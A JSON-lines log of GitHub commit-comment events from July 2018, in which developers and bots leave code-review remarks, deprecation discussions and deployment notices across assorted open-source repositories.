{"id":"7970602952","type":"CommitCommentEvent","actor":{"login":"neritrading"},"repo":{"name":"neritrading/ltree"},"payload":{"comment":{"id":29720253,"position":null,"line":null,"path":null,"commit_id":"ee2dc479411cfe25496325465568bbe39c3860f2","created_at":"2018-07-16T13:17:47Z","updated_at":"2018-07-16T13:17:47Z","author_association":"OWNER","body":"https://github.com/Araton95/neritrading-token/commit/a2e351d5ba13489a1ac2ba45f791138e508d1521#diff-46ecf76056b7ae295fc73df0d8d9cfcd"}},"created_at":"2018-07-16T13:17:47Z"}
{"id":"7970603879","type":"CommitCommentEvent","actor":{"login":"neritrading"},"repo":{"name":"neritrading/ltree"},"payload":{"comment":{"id":29720254,"position":null,"line":null,"path":null,"commit_id":"ee2dc479411cfe25496325465568bbe39c3860f2","created_at":"2018-07-16T13:17:56Z","updated_at":"2018-07-16T13:17:56Z","author_association":"OWNER","body":"https://github.com/Araton95/neritrading-token/commit/a2e351d5ba13489a1ac2ba45f791138e508d1521#diff-1bd2791370f34377d0864b9f9db7d7de"}},"created_at":"2018-07-16T13:17:56Z"}
{"id":"7970604526","type":"CommitCommentEvent","actor":{"login":"neritrading"},"repo":{"name":"neritrading/ltree"},"payload":{"comment":{"id":29720257,"position":null,"line":null,"path":null,"commit_id":"ee2dc479411cfe25496325465568bbe39c3860f2","created_at":"2018-07-16T13:18:04Z","updated_at":"2018-07-16T13:18:04Z","author_association":"OWNER","body":"https://github.com/Araton95/neritrading-token/commit/a2e351d5ba13489a1ac2ba45f791138e508d1521#diff-453657a2c570be7f38bc4f6b8c156e90"}},"created_at":"2018-07-16T13:18:04Z"}
{"id":"7970606773","type":"CommitCommentEvent","actor":{"login":"nihilus"},"repo":{"name":"koalaman/shellcheck"},"payload":{"comment":{"id":29720265,"position":null,"line":null,"path":null,"commit_id":"10edba3ab82d58fb262a6ab3cc0245c0e6372259","created_at":"2018-07-16T13:18:28Z","updated_at":"2018-07-16T13:18:28Z","author_association":"NONE","body":"Would'nt -Os decrease speed/performance when iterating over many files?"}},"created_at":"2018-07-16T13:18:28Z"}
{"id":"7970608438","type":"CommitCommentEvent","actor":{"login":"cdambo"},"repo":{"name":"Rafi1900/1901"},"payload":{"comment":{"id":29720268,"position":30,"line":20,"path":"run.rb","commit_id":"b0799d2074e61a3bf40126ebc03834a744d65823","created_at":"2018-07-16T13:18:45Z","updated_at":"2018-07-16T13:18:45Z","author_association":"COLLABORATOR","body":"maybe better `demo`"}},"created_at":"2018-07-16T13:18:45Z"}
{"id":"7970610155","type":"CommitCommentEvent","actor":{"login":"aldenml"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":29720275,"position":null,"line":null,"path":null,"commit_id":"1793f2cbed711c3de6154262a620374141c9ec44","created_at":"2018-07-16T13:19:06Z","updated_at":"2018-07-16T13:19:06Z","author_association":"COLLABORATOR","body":"I highly doubt that's the problem, but `menu` sometimes is `null` due to some android framework bug, are we sure the line corresponds to the the actual source code?"}},"created_at":"2018-07-16T13:19:06Z"}
{"id":"7970611509","type":"CommitCommentEvent","actor":{"login":"cdambo"},"repo":{"name":"Rafi1900/1901"},"payload":{"comment":{"id":29720280,"position":13,"line":12,"path":"README.md","commit_id":"b0799d2074e61a3bf40126ebc03834a744d65823","created_at":"2018-07-16T13:19:20Z","updated_at":"2018-07-16T13:19:20Z","author_association":"COLLABORATOR","body":"בדקת שאאוטפוט נכון?"}},"created_at":"2018-07-16T13:19:20Z"}
{"id":"7970612915","type":"CommitCommentEvent","actor":{"login":"gashcrumb"},"repo":{"name":"phantomjinx/syndesis"},"payload":{"comment":{"id":29720284,"position":5,"line":16,"path":"app/ui/package.json","commit_id":"09040815d01ced2946f88000d5d5249e610fa740","created_at":"2018-07-16T13:19:36Z","updated_at":"2018-07-16T13:19:36Z","author_association":"NONE","body":"Yeah, I think adding a `start:oc-cluster` script would be the way to go..."}},"created_at":"2018-07-16T13:19:36Z"}
{"id":"7970619117","type":"CommitCommentEvent","actor":{"login":"cdambo"},"repo":{"name":"Rafi1900/1901"},"payload":{"comment":{"id":29720297,"position":6,"line":5,"path":"process_csv.rb","commit_id":"70b92f87c38e81d97462ad51fc8fe8407e701ee6","created_at":"2018-07-16T13:20:44Z","updated_at":"2018-07-16T13:20:44Z","author_association":"COLLABORATOR","body":"you don't need to declare these"}},"created_at":"2018-07-16T13:20:44Z"}
{"id":"7970621312","type":"CommitCommentEvent","actor":{"login":"Andre221"},"repo":{"name":"MoordMachineYT/user-projects"},"payload":{"comment":{"id":29720304,"position":null,"line":null,"path":null,"commit_id":"45e74c85b1fa8d205c9961eb251929894d00019b","created_at":"2018-07-16T13:21:10Z","updated_at":"2018-07-16T13:21:10Z","author_association":"NONE","body":"Muahahahahahahah"}},"created_at":"2018-07-16T13:21:10Z"}
{"id":"7970624088","type":"CommitCommentEvent","actor":{"login":"KevinOConnor"},"repo":{"name":"KevinOConnor/klipper"},"payload":{"comment":{"id":29720312,"position":null,"line":null,"path":null,"commit_id":"e35f926ca63c704c55f4824226cb91a6d38fcfa6","created_at":"2018-07-16T13:21:40Z","updated_at":"2018-07-16T13:21:40Z","author_association":"OWNER","body":"On Mon, Jul 16, 2018 at 02:09:17AM -0700, Florian Heilmann wrote:\n> Would it be possible to also implement a custom resume handling? \n\nCustom resume handling would be harder to implement as it would\nrequire stalling any future commands until after the resume handler\nruns.\n\n> e.g. if the toolhead is moved to an idle position and X and Y axis are disabled, a resume handler would home X and Y axii and move back to the previous position?\n\nI was mainly thinking that the idle_timeout gcode would be useful for\npowering things off.\n\n-Kevin\n"}},"created_at":"2018-07-16T13:21:40Z"}
{"id":"7970627229","type":"CommitCommentEvent","actor":{"login":"hellodave76"},"repo":{"name":"aidandyde/tech-task"},"payload":{"comment":{"id":29720322,"position":48,"line":48,"path":"TechnicalTask/index.php","commit_id":"c932cc0ddeda0aec5608d3fe0a568974585b41c6","created_at":"2018-07-16T13:22:14Z","updated_at":"2018-07-16T13:22:14Z","author_association":"NONE","body":"`$isUnique`"}},"created_at":"2018-07-16T13:22:14Z"}
{"id":"7970628055","type":"CommitCommentEvent","actor":{"login":"hfroot"},"repo":{"name":"haplo-org/haplo-standard-plugins-dev"},"payload":{"comment":{"id":29720325,"position":null,"line":null,"path":null,"commit_id":"aabdb9429be4b4e82c32c9faa1980d08d1276637","created_at":"2018-07-16T13:22:22Z","updated_at":"2018-07-16T13:22:22Z","author_association":"CONTRIBUTOR","body":"Reviewed by Ben"}},"created_at":"2018-07-16T13:22:22Z"}
{"id":"7970629511","type":"CommitCommentEvent","actor":{"login":"gashcrumb"},"repo":{"name":"phantomjinx/syndesis"},"payload":{"comment":{"id":29720327,"position":null,"line":null,"path":null,"commit_id":"09040815d01ced2946f88000d5d5249e610fa740","created_at":"2018-07-16T13:22:38Z","updated_at":"2018-07-16T13:22:38Z","author_association":"NONE","body":"> So have been looking at a means of getting back the OS host using oc but cannot find a way at the moment.\r\n\r\nYeah!  Really weird that it isn't available from `oc`, I spent a good part of an afternoon last week looking for something until finally resorting to running `minishift`\r\n\r\nIf you do a `start:oc-cluster` command then it'd probably also then be worth adding a setup script separate from `minishift-setup.sh` that produces a `config.json` file suitable for your environment, I think that'd be fine."}},"created_at":"2018-07-16T13:22:38Z"}
{"id":"7970629597","type":"CommitCommentEvent","actor":{"login":"dougshell"},"repo":{"name":"sangyeolbaek/Simply-Love-SM5"},"payload":{"comment":{"id":29720328,"position":null,"line":null,"path":null,"commit_id":"2c7dc3a8fa8b09ecd24d039c65b88ffca89b2103","created_at":"2018-07-16T13:22:39Z","updated_at":"2018-07-16T13:22:39Z","author_association":"NONE","body":"I have a working Glowing Grades option menu now and can share in a PR.\r\n\r\nDo you have plans to update your code base to aling with Simply Love 4.8  The code has some conflicts with 4.8 but if you have plans to do so, I will submit a PR so you can see how I've linked the option to a \"Simply Love\" option toggle, and we can go from there."}},"created_at":"2018-07-16T13:22:39Z"}
{"id":"7970629696","type":"CommitCommentEvent","actor":{"login":"cwp9egma21"},"repo":{"name":"cwp9egma21/index.html"},"payload":{"comment":{"id":29720329,"position":null,"line":null,"path":null,"commit_id":"466e4861e1ee88e7d11803bd69a474554b21adc9","created_at":"2018-07-16T13:22:40Z","updated_at":"2018-07-16T13:22:40Z","author_association":"OWNER","body":"https://github.com/cwp9egma21/index.html/commit/466e4861e1ee88e7d11803bd69a474554b21adc9#diff-03af71fc184d37db4c2f82f32d1b73d1"}},"created_at":"2018-07-16T13:22:40Z"}
{"id":"7970629828","type":"CommitCommentEvent","actor":{"login":"jcfr"},"repo":{"name":"OpenDataAnalytics/kitware-geospatial-recipes"},"payload":{"comment":{"id":29720330,"position":5,"line":16,"path":"recipes/texture-atlas/meta.yaml","commit_id":"af3d7d36f8f4b2d1c7371b01b90631134b38b208","created_at":"2018-07-16T13:22:42Z","updated_at":"2018-07-16T13:22:42Z","author_association":"NONE","body":"Does this mean there is a `kitware-geospatial` channel ? Or is it the same as https://github.com/conda-forge/vtk-feedstock published on conda-forge ?"}},"created_at":"2018-07-16T13:22:42Z"}
{"id":"7970633815","type":"CommitCommentEvent","actor":{"login":"cdambo"},"repo":{"name":"Rafi1900/1901"},"payload":{"comment":{"id":29720340,"position":35,"line":28,"path":"process_csv.rb","commit_id":"70b92f87c38e81d97462ad51fc8fe8407e701ee6","created_at":"2018-07-16T13:23:25Z","updated_at":"2018-07-16T13:23:25Z","author_association":"COLLABORATOR","body":"instead of setting instance variables, I would dump all this in a hash and propagate it to the `process()` method"}},"created_at":"2018-07-16T13:23:25Z"}
{"id":"7970639974","type":"CommitCommentEvent","actor":{"login":"zimeon"},"repo":{"name":"OCFL/spec"},"payload":{"comment":{"id":29720349,"position":null,"line":null,"path":null,"commit_id":"5c78ddef24370b95e733e3966a945c41cc9930a3","created_at":"2018-07-16T13:24:29Z","updated_at":"2018-07-16T13:24:29Z","author_association":"CONTRIBUTOR","body":"I think the object part of the spec should be able to stand alone from the\nstorage root and layout part -- so one can have conforming single objects\nfor transfer/assembly etc., or even use some other layout.\n\nGiven the above, if we want to restrict version naming for all objects\nunder a root to be the same, I think the restriction should be in the\nlayout part of the spec. However, I don't see the motivation for the\nrestriction. Sure, it would be tidy but what if one wanted to mix old and\nnew content? I don't think a mix would lead to any ambiguity.\n\nOn Fri, Jul 13, 2018, 6:33 PM Rosalyn Metz <notifications@github.com> wrote:\n\n> @awoods <https://github.com/awoods> i don't have a preference either way\n> (i can see reasons to do both) debate with @OCFL/editors\n> <https://github.com/orgs/OCFL/teams/editors> would be good though...\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/OCFL/spec/commit/5c78ddef24370b95e733e3966a945c41cc9930a3#commitcomment-29706234>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAoMqGPJ8StWFVE4UB6v440gjVkujLGVks5uGSAzgaJpZM4VPD_R>\n> .\n>\n"}},"created_at":"2018-07-16T13:24:29Z"}
{"id":"7970644269","type":"CommitCommentEvent","actor":{"login":"hellodave76"},"repo":{"name":"aidandyde/tech-task"},"payload":{"comment":{"id":29720353,"position":138,"line":138,"path":"TechnicalTask/index.php","commit_id":"c932cc0ddeda0aec5608d3fe0a568974585b41c6","created_at":"2018-07-16T13:25:15Z","updated_at":"2018-07-16T13:25:15Z","author_association":"NONE","body":"`$halfwayPointc` > `$halfwayPoint`"}},"created_at":"2018-07-16T13:25:15Z"}
{"id":"7970645035","type":"CommitCommentEvent","actor":{"login":"hellodave76"},"repo":{"name":"aidandyde/tech-task"},"payload":{"comment":{"id":29720355,"position":155,"line":155,"path":"TechnicalTask/index.php","commit_id":"c932cc0ddeda0aec5608d3fe0a568974585b41c6","created_at":"2018-07-16T13:25:23Z","updated_at":"2018-07-16T13:25:23Z","author_association":"NONE","body":"`$halfwayPointc` > `$halfwayPoint`"}},"created_at":"2018-07-16T13:25:23Z"}
{"id":"7970670539","type":"CommitCommentEvent","actor":{"login":"MNKCrypto"},"repo":{"name":"MNKCrypto/ReentrantIssue"},"payload":{"comment":{"id":29720531,"position":45,"line":45,"path":"contracts/HoneyProcessor.sol","commit_id":"44a5860753abe842e0029718c4e51376598de087","created_at":"2018-07-16T13:29:48Z","updated_at":"2018-07-16T13:29:48Z","author_association":"OWNER","body":"Ok. Got it. I believe we have to do everything as part of a single transaction"}},"created_at":"2018-07-16T13:29:48Z"}
{"id":"7970671790","type":"CommitCommentEvent","actor":{"login":"tbroyer"},"repo":{"name":"iTowns/itowns"},"payload":{"comment":{"id":29720534,"position":5,"line":61,"path":"test/examples/bootstrap.js","commit_id":"fe1247195a51b8645b23fc86b47c6730cebbabd0","created_at":"2018-07-16T13:30:02Z","updated_at":"2018-07-16T13:30:02Z","author_association":"CONTRIBUTOR","body":"I'll just note that in `waitUntilItownsIsIdle` you were unconditionally taking a screen shot, assuming `screenshotName` was never nullish; so this is a slight change in behavior.\r\nI think it's fine, but just in case you were expecting it…"}},"created_at":"2018-07-16T13:30:02Z"}
{"id":"7970672769","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/conda-feedstock"},"payload":{"comment":{"id":29720537,"position":null,"line":null,"path":null,"commit_id":"3315e31d63ac53f4868fbb79e968d66e39ffe7e2","created_at":"2018-07-16T13:30:13Z","updated_at":"2018-07-16T13:30:13Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @mbargull were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-16T13:30:13Z"}
{"id":"7970680215","type":"CommitCommentEvent","actor":{"login":"godo13405"},"repo":{"name":"godo13405/dragon-spellbook"},"payload":{"comment":{"id":29720562,"position":null,"line":null,"path":null,"commit_id":"b2a56562af6223c9c4610746619061cad8489f5a","created_at":"2018-07-16T13:31:28Z","updated_at":"2018-07-16T13:31:28Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/48c4c854-767b-47f7-b2ec-7f79e14cf35d?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/7ddab936-a781-49fa-99fc-742d790aea96?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\") deployed [dragon-spellbook](https://github.com/godo13405/dragon-spellbook/releases/tag/deploy-ibm-yp-eu-gb-UXCalibur-prod-20180716-133126 \"deploy-ibm-yp-eu-gb-UXCalibur-prod-20180716-133126\") to [prod](https://console.bluemix.net/apps/aaffb021-5482-4ff5-bc14-26c90db6686c?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:UXCalibur:prod\"), including this commit"}},"created_at":"2018-07-16T13:31:28Z"}
{"id":"7970681052","type":"CommitCommentEvent","actor":{"login":"madig"},"repo":{"name":"nikramakrishnan/freetype-docwriter"},"payload":{"comment":{"id":29720564,"position":null,"line":null,"path":null,"commit_id":"640159ae23de31df5e22c1b1f62cbaeaf0249d05","created_at":"2018-07-16T13:31:36Z","updated_at":"2018-07-16T13:31:36Z","author_association":"NONE","body":"This formatting is what's recommended in https://www.python.org/dev/peps/pep-0257/#one-line-docstrings. Basically, if a docstring is just one line (ending with a \".\"), it gets compressed like that. As you saw on the FT list, this has an element ob subjectivity to it, but that's perfectly fine. You get used to it the more you see it and then it feels natural to you -- by then, you might as well use automated tools to do the boring work for you. That is the key point when I said there is no reason for a project to look different from what PEP 8 and 257 recommend ;)"}},"created_at":"2018-07-16T13:31:36Z"}
{"id":"7970683062","type":"CommitCommentEvent","actor":{"login":"TommyClausner"},"repo":{"name":"agramfort/mne-python"},"payload":{"comment":{"id":29720567,"position":273,"line":1341,"path":"mne/morph.py","commit_id":"ed3f15735d7966010356e568fc3691788b81a660","created_at":"2018-07-16T13:31:58Z","updated_at":"2018-07-16T13:31:58Z","author_association":"NONE","body":"@larsoner almost agree ;)\r\n\r\ncould we deprecate ``compute_morph_matrix`` and tell people to use SourceMorph() and that they can access the morph matrix via\r\n```\r\nmorph = SourceMorph()\r\nmorph_mat = morph.data['morph_mat']\r\n```\r\n... this is how it's now.\r\n\r\nAgree for the rest :)"}},"created_at":"2018-07-16T13:31:58Z"}
{"id":"7970683780","type":"CommitCommentEvent","actor":{"login":"Jamesking56"},"repo":{"name":"aidandyde/tech-task"},"payload":{"comment":{"id":29720569,"position":208,"line":208,"path":"TechnicalTask/index.php","commit_id":"c932cc0ddeda0aec5608d3fe0a568974585b41c6","created_at":"2018-07-16T13:32:07Z","updated_at":"2018-07-16T13:32:07Z","author_association":"NONE","body":"`$valsObj` is undefined, you need to define it with `$valsObj = new stdClass();`"}},"created_at":"2018-07-16T13:32:07Z"}
{"id":"7970687427","type":"CommitCommentEvent","actor":{"login":"TommyClausner"},"repo":{"name":"agramfort/mne-python"},"payload":{"comment":{"id":29720580,"position":273,"line":1341,"path":"mne/morph.py","commit_id":"ed3f15735d7966010356e568fc3691788b81a660","created_at":"2018-07-16T13:32:45Z","updated_at":"2018-07-16T13:32:45Z","author_association":"NONE","body":"(the name ``.data`` was suggested to be called ``.params`` or so)"}},"created_at":"2018-07-16T13:32:45Z"}
{"id":"7970688418","type":"CommitCommentEvent","actor":{"login":"larsoner"},"repo":{"name":"agramfort/mne-python"},"payload":{"comment":{"id":29720582,"position":273,"line":1341,"path":"mne/morph.py","commit_id":"ed3f15735d7966010356e568fc3691788b81a660","created_at":"2018-07-16T13:32:56Z","updated_at":"2018-07-16T13:32:56Z","author_association":"COLLABORATOR","body":"yes that's fine by me, @agramfort does my (edited) plan above make sense to you, too?"}},"created_at":"2018-07-16T13:32:56Z"}
{"id":"7970690368","type":"CommitCommentEvent","actor":{"login":"Jamesking56"},"repo":{"name":"aidandyde/tech-task"},"payload":{"comment":{"id":29720593,"position":80,"line":80,"path":"TechnicalTask/index.php","commit_id":"c932cc0ddeda0aec5608d3fe0a568974585b41c6","created_at":"2018-07-16T13:33:18Z","updated_at":"2018-07-16T13:33:18Z","author_association":"NONE","body":"You have a double semi-colon here, only need 1"}},"created_at":"2018-07-16T13:33:18Z"}
{"id":"7970691070","type":"CommitCommentEvent","actor":{"login":"donaldsharp"},"repo":{"name":"opensourcerouting/frr"},"payload":{"comment":{"id":29720595,"position":13,"line":13,"path":"isisd/fabricd.conf.sample","commit_id":"7157cce2785bca34540d316c5b47101787e7fef1","created_at":"2018-07-16T13:33:25Z","updated_at":"2018-07-16T13:33:25Z","author_association":"NONE","body":"Is it possible to make the net statement be auto-generated in some manner?  "}},"created_at":"2018-07-16T13:33:25Z"}
{"id":"7970692055","type":"CommitCommentEvent","actor":{"login":"Henry2o1o"},"repo":{"name":"berlinux2016/MIUI10"},"payload":{"comment":{"id":29720596,"position":null,"line":null,"path":null,"commit_id":"1ca30705177af3645f7f61f06110239e01d6f36d","created_at":"2018-07-16T13:33:35Z","updated_at":"2018-07-16T13:33:35Z","author_association":"COLLABORATOR","body":"![image](https://user-images.githubusercontent.com/6131799/42761355-94e3e5c6-890d-11e8-8dc6-377bec43095f.png)\r\n![image](https://user-images.githubusercontent.com/6131799/42761364-99785266-890d-11e8-8178-b3268ad8f7e3.png)\r\n"}},"created_at":"2018-07-16T13:33:35Z"}
{"id":"7970692195","type":"CommitCommentEvent","actor":{"login":"p51i"},"repo":{"name":"UI-Research/next50"},"payload":{"comment":{"id":29720598,"position":null,"line":null,"path":null,"commit_id":"21fc71dc38296fa38d670d2739cd8627ea19864d","created_at":"2018-07-16T13:33:37Z","updated_at":"2018-07-16T13:33:37Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [next50#dev](https://dashboard.pantheon.io/sites/8e7c33cd-c6bd-4dcf-a71d-f1ade4f2e791#dev).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://dev-next50.pantheonsite.io/)"}},"created_at":"2018-07-16T13:33:37Z"}
{"id":"7970694888","type":"CommitCommentEvent","actor":{"login":"dreua"},"repo":{"name":"cnlohr/cnping"},"payload":{"comment":{"id":29720603,"position":null,"line":null,"path":null,"commit_id":"67bf9b73eefe1de63bed8608e7cb79250bea5f3d","created_at":"2018-07-16T13:34:05Z","updated_at":"2018-07-16T13:34:05Z","author_association":"CONTRIBUTOR","body":"Gah, I should have done this in the first place: `colordiff <(strings cnping_cnlohr.exe) <(strings cnping_dreua.exe) -y`\r\nThe point is, we have the same number of \"version strings\" but on my Fedora it's just longer:\r\n`cnlohr's exe: GCC: (GNU) 5.3.1 20151207` \r\n`dreua's  exe: GCC: (GNU) 7.1.0 20170502 (Fedora MinGW 7.1.0-1.fc27)`\r\n\r\nWe can get rid of a _few_ of these by passing `-fno-ident` but even on a minimal \"Hello World\"-program this leaves us with 27 version strings in the exe. (I guess they are already in some object files which are linked together and -fno-ident is only affecting compilation not linking.)\r\nA manual call to `strip -s cnping.exe`did't help either."}},"created_at":"2018-07-16T13:34:05Z"}
{"id":"7970697462","type":"CommitCommentEvent","actor":{"login":"agramfort"},"repo":{"name":"agramfort/mne-python"},"payload":{"comment":{"id":29720607,"position":273,"line":1341,"path":"mne/morph.py","commit_id":"ed3f15735d7966010356e568fc3691788b81a660","created_at":"2018-07-16T13:34:31Z","updated_at":"2018-07-16T13:34:31Z","author_association":"OWNER","body":"agreed except I would deprecated fully morph_precomputed\n\nso now stc.morph always employs the fast approach.\n"}},"created_at":"2018-07-16T13:34:31Z"}
{"id":"7970698048","type":"CommitCommentEvent","actor":{"login":"BenLubar"},"repo":{"name":"JapaMala/armok-vision"},"payload":{"comment":{"id":29720608,"position":null,"line":null,"path":null,"commit_id":"bbb87029d5db2f8ed72196d3529057116f61ed09","created_at":"2018-07-16T13:34:37Z","updated_at":"2018-07-16T13:34:37Z","author_association":"CONTRIBUTOR","body":"I'm super curious, but I don't want to install Unity right now. Do you have any screenshots of what it looks like so far?"}},"created_at":"2018-07-16T13:34:37Z"}
{"id":"7970700341","type":"CommitCommentEvent","actor":{"login":"sjdawson"},"repo":{"name":"aidandyde/tech-task"},"payload":{"comment":{"id":29720614,"position":31,"line":31,"path":"TechnicalTask/index.php","commit_id":"c932cc0ddeda0aec5608d3fe0a568974585b41c6","created_at":"2018-07-16T13:35:01Z","updated_at":"2018-07-16T13:35:01Z","author_association":"NONE","body":"This line needs indenting. :boot: "}},"created_at":"2018-07-16T13:35:01Z"}
{"id":"7970700413","type":"CommitCommentEvent","actor":{"login":"sjdawson"},"repo":{"name":"aidandyde/tech-task"},"payload":{"comment":{"id":29720615,"position":32,"line":32,"path":"TechnicalTask/index.php","commit_id":"c932cc0ddeda0aec5608d3fe0a568974585b41c6","created_at":"2018-07-16T13:35:01Z","updated_at":"2018-07-16T13:35:01Z","author_association":"NONE","body":"And this line can be removed. :wave: "}},"created_at":"2018-07-16T13:35:01Z"}
{"id":"7970701182","type":"CommitCommentEvent","actor":{"login":"TommyClausner"},"repo":{"name":"agramfort/mne-python"},"payload":{"comment":{"id":29720617,"position":273,"line":1341,"path":"mne/morph.py","commit_id":"ed3f15735d7966010356e568fc3691788b81a660","created_at":"2018-07-16T13:35:11Z","updated_at":"2018-07-16T13:35:11Z","author_association":"NONE","body":"True makes sense - happy to do so"}},"created_at":"2018-07-16T13:35:11Z"}
{"id":"7970705744","type":"CommitCommentEvent","actor":{"login":"hellodave76"},"repo":{"name":"aidandyde/tech-task"},"payload":{"comment":{"id":29720622,"position":9,"line":9,"path":"TechnicalTask/index.php","commit_id":"c932cc0ddeda0aec5608d3fe0a568974585b41c6","created_at":"2018-07-16T13:35:56Z","updated_at":"2018-07-16T13:35:56Z","author_association":"NONE","body":"`$row` is also unused."}},"created_at":"2018-07-16T13:35:56Z"}
{"id":"7970708092","type":"CommitCommentEvent","actor":{"login":"sjdawson"},"repo":{"name":"aidandyde/tech-task"},"payload":{"comment":{"id":29720628,"position":8,"line":8,"path":"TechnicalTask/index.php","commit_id":"c932cc0ddeda0aec5608d3fe0a568974585b41c6","created_at":"2018-07-16T13:36:19Z","updated_at":"2018-07-16T13:36:19Z","author_association":"NONE","body":"The second parameter of `fgetcsv` lets you set the maximum line-length in the CSV. As you know the file going in (based on `example.csv`) has a max line-length of 9 chars, (`5, 233.00`), allowing one or two for outliers, you could set this to `12` (for example) from `1000` for better performance. You'd need to check this for the full file, as it would have a larger incremental number in the first column.\r\n\r\n```\r\nThis can only really work if you know the line-lengths, otherwise, you may end up with trunca\r\n```\r\n\r\n:smile: "}},"created_at":"2018-07-16T13:36:19Z"}
{"id":"7970708255","type":"CommitCommentEvent","actor":{"login":"larsoner"},"repo":{"name":"agramfort/mne-python"},"payload":{"comment":{"id":29720630,"position":273,"line":1341,"path":"mne/morph.py","commit_id":"ed3f15735d7966010356e568fc3691788b81a660","created_at":"2018-07-16T13:36:21Z","updated_at":"2018-07-16T13:36:21Z","author_association":"COLLABORATOR","body":"Works for me"}},"created_at":"2018-07-16T13:36:21Z"}
{"id":"7970709755","type":"CommitCommentEvent","actor":{"login":"sjdawson"},"repo":{"name":"aidandyde/tech-task"},"payload":{"comment":{"id":29720636,"position":9,"line":9,"path":"TechnicalTask/index.php","commit_id":"c932cc0ddeda0aec5608d3fe0a568974585b41c6","created_at":"2018-07-16T13:36:35Z","updated_at":"2018-07-16T13:36:35Z","author_association":"NONE","body":"`$num` isn't used anywhere else in this function, so you should be able to safely remove this line without consequence. :wastebasket: "}},"created_at":"2018-07-16T13:36:35Z"}
{"id":"7970713893","type":"CommitCommentEvent","actor":{"login":"Jamesking56"},"repo":{"name":"aidandyde/tech-task"},"payload":{"comment":{"id":29720643,"position":211,"line":211,"path":"TechnicalTask/index.php","commit_id":"c932cc0ddeda0aec5608d3fe0a568974585b41c6","created_at":"2018-07-16T13:37:19Z","updated_at":"2018-07-16T13:37:19Z","author_association":"NONE","body":"`Undefined offset 1`"}},"created_at":"2018-07-16T13:37:19Z"}
{"id":"7970715273","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/java-api"},"payload":{"comment":{"id":29720651,"position":null,"line":null,"path":null,"commit_id":"080bf72c9e1fc43ca506d8a15496c2c1c9ee8414","created_at":"2018-07-16T13:37:34Z","updated_at":"2018-07-16T13:37:34Z","author_association":"COLLABORATOR","body":"Puzzle `4-aab61a84` disappeared from [`src/main/java/io/zold/api/WalletsIn.java`](https://github.com/zold-io/java-api/blob/master/src/main/java/io/zold/api/WalletsIn.java), that's why I closed #13. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-16T13:37:34Z"}
{"id":"7970716081","type":"CommitCommentEvent","actor":{"login":"sjdawson"},"repo":{"name":"aidandyde/tech-task"},"payload":{"comment":{"id":29720653,"position":11,"line":11,"path":"TechnicalTask/index.php","commit_id":"c932cc0ddeda0aec5608d3fe0a568974585b41c6","created_at":"2018-07-16T13:37:42Z","updated_at":"2018-07-16T13:37:42Z","author_association":"NONE","body":"Similar, `$row` isn't used outside of this loop, so you could remove this and line 5 without consequence. :no_entry_sign: "}},"created_at":"2018-07-16T13:37:42Z"}
{"id":"7970716509","type":"CommitCommentEvent","actor":{"login":"waau"},"repo":{"name":"x86cpu/android_kernel_lge_msm8996"},"payload":{"comment":{"id":29720655,"position":null,"line":null,"path":null,"commit_id":"2f1dcea99977c82d7dedc4ba27357e753073f3a3","created_at":"2018-07-16T13:37:47Z","updated_at":"2018-07-16T13:37:47Z","author_association":"NONE","body":"@x86cpu \r\nHey, is there any commit history for this squash?\r\n\r\nCheers."}},"created_at":"2018-07-16T13:37:47Z"}
{"id":"7970716996","type":"CommitCommentEvent","actor":{"login":"ODugas"},"repo":{"name":"savoirfairelinux/cukinia"},"payload":{"comment":{"id":29720656,"position":5,"line":379,"path":"cukinia","commit_id":"91fd724e1e5e2a71020a509ae0552f59eae23a6c","created_at":"2018-07-16T13:37:52Z","updated_at":"2018-07-16T13:37:52Z","author_association":"NONE","body":"If you pick @gazoo74's solution, I would add the -q flag in grep to avoid undesirable output in the terminal."}},"created_at":"2018-07-16T13:37:52Z"}
{"id":"7970718041","type":"CommitCommentEvent","actor":{"login":"ShanmukhaSrinivas"},"repo":{"name":"Saif-Shines/SathyabamaTBIwebsite"},"payload":{"comment":{"id":29720659,"position":null,"line":null,"path":null,"commit_id":"1b8f51c08c9a3e0e2cd2e8c28a3717a831cf9120","created_at":"2018-07-16T13:38:02Z","updated_at":"2018-07-16T13:38:02Z","author_association":"CONTRIBUTOR","body":"![20180630_150855-01](https://user-images.githubusercontent.com/36005710/42761501-5cfb046e-892b-11e8-8211-3c8172149525.jpeg)\r\nThis is the logo used insted of old one.\r\nProject has already been submitted to TBI manager . "}},"created_at":"2018-07-16T13:38:02Z"}
{"id":"7970721562","type":"CommitCommentEvent","actor":{"login":"iimpulse"},"repo":{"name":"monarch-initiative/phenol"},"payload":{"comment":{"id":29720670,"position":5,"line":15,"path":"phenol-io/pom.xml","commit_id":"2c683cd5d3657fd23c9e31c5857f8e1456d0bc22","created_at":"2018-07-16T13:38:38Z","updated_at":"2018-07-16T13:38:38Z","author_association":"COLLABORATOR","body":"Not quite sure how this got to 1.1.0. The branch was moved from 1.1.0 -> 1.2.0.  You might have been out of sync here. "}},"created_at":"2018-07-16T13:38:38Z"}
